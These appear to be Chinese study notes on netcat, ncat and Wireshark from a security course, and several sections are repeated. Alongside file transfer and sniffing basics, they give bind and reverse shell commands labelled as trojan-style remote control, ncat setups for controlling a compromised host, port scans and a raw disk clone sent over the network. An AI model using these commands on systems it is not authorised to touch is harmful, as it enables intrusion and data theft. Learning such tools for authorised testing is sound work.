64位 首先作为被空端
man 是手册 通过man+命令 查看命令使用方法
wirshark 可以进行网络抓包嗅探 也可以将流量包保存下来 进行场景分析
wireshark 主要是分析 衡量一个抓包软件好坏 就是看解码能力
64位 首先作为被空端
man 是手册 通过man+命令 查看命令使用方法
wirshark 可以进行网络抓包嗅探 也可以将流量包保存下来 进行场景分析
wireshark 主要是分析 衡量一个抓包软件好坏 就是看解码能力
ncat 弥补了nc连接后肉鸡对入侵者缺乏认证,谁都可以通过端口进行控制它的缺点
ncat -c bash --allow 1.1.1.1 -vnl 333 --ssl 被控制端, --allow:只允许特定的ip访问它,ssl:加密
ncat -nv 10.1.1.1 333 -ssl
控制端
nc缺乏加密和身份验证的能力
ncat包含于nmap工具包中
不同系统/平台的nc参数功能不尽相同,弥补nc的不足
Wireshark 抓包分析
网卡上的数据包 Interface List
使用混杂模式+抓包筛选器
pcap 兼容性最好
筛选器:抓包、显示
NETCAT缺陷
NC缺乏加密和身份验证能力
明文传输
服务器端易被嗅探,还原出数据交换内容,易被别人窃取内容
Ncat:
Ncat 包含于nmap工具包中,可以弥补nc加密及身份验证不足
A:ncat -c bash -allow ip地址 -vnl 333 --ssl
B: ncat -nv ip地址 333 --ssl
ssl: 加密管道
-allow IP地址 只允许目标IP控制
不同系统平台的nc参数不同
man 查询命令
nc -h或nc --help
WIRESHARK
抓包嗅探协议分析
安全专家必备的技能
抓包引擎
libpcap9 ——linux
winpcap10 ——windows
wireshark 对抓到的包进行解码
wireshark 筛选器
1.抓包筛选器
2.显示筛选器
1. nc -h
基本格式:nc [-options] hostname port [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point, up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
2.nc的基本用法
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
传输⽂文本信息
A:nc -l -p 4444
• B:nc –nv 1.1.1.1 4444
传输⽂件/目录
• 传输⽂件
• A:nc -lp 333 > 1.mp4
• B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1 • 或 • A:nc -q 1 -lp 333 < a.mp4 • B: nc -nv 1.1.1.1 333 > 2.mp4
• 传输目录
• A:tar -cvf - music/ | nc -lp 333 –q 1 • B:nc -nv 1.1.1.1 333 | tar -xvf –
加密传输⽂件
• 加密传⽂件
• A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
• B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
远程控制/⽊马
加密所有流量
流媒体服务器
A: cat 1.mp4 | nc -lp 333
B: 1.1.1.1 333 | mplayer -vo x11 -cache 3000
远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
远程控制:
正向:
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
• 反向:
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash • 注:Windows⽤用户把bash改成cmd;
nccat:管道加密
A:ncat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
B:ncat -nv 1.1.1.1 333 --ssl
NC
侦听模式/传输模式
telnet / 获取banner信息
nc -nv 1.1.1.1 110 (pop3)
nc -nv 1.1.1.1 25 (smtp)
nc -nv 1.1.1.1 80
-v:显示相关的详细链接信息
-n:加ip地址时不进行dns解析
传输文本信息
A:nc -l -p 4444
B:nc -nv 1.1.1.1 4444
-l:listen,打开监听一个端口
-p:指定开放端口号
-q:nc完就断开连接
A: nc -l -p 333 > ps.txt
B: ps aux | nc -nv AIP -q 1
传输文件/目录
传输文件:
A: nc -l -p 333 > 1.map4
B: nc -nv AIP 333 < 1.mp4 -q 1
或
A: nc -l -p 333 < a.mp4 -q 1
B: nc -nv AIP 333 > b.mp4
>: 表示接收方
<: 表示发送方
传输目录:
A: tar -cvf - music/ | nc -lp 333 -q 1
B: nc -nv AIP 333 | tar -xvf -
先把目录打包,在放到nc的管道中
加密传输文件
A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-356 -m ecb < a.mp4 | nc -nv AIP 333 -q 1
远程控制/木马
正向:
A: nc -lp 333 -c bash
B: nc 1.1.1.1 333
反向:
A: nc -lp 333
B: nc 1.1.1.1 333 -c bash
注:Windows用户把bash改成cmd
加密所有流量
流媒体服务器
server: cat 1.mp4 | nc -lp 333
client: nc -nv serverIP 333 | mplayer -vo x11 -cache 3000 -
远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
端口扫描
nc -nvz 1.1.1.1 1-65535
nc-vnzu 1.1.1.1 1-1024
-z: 扫描模式
-u; 探测所有udp端口
ncat
A: ncat -c bash --allow bIP -vnl 333 --ssl
B: ncat -nv aIP 333 --ssl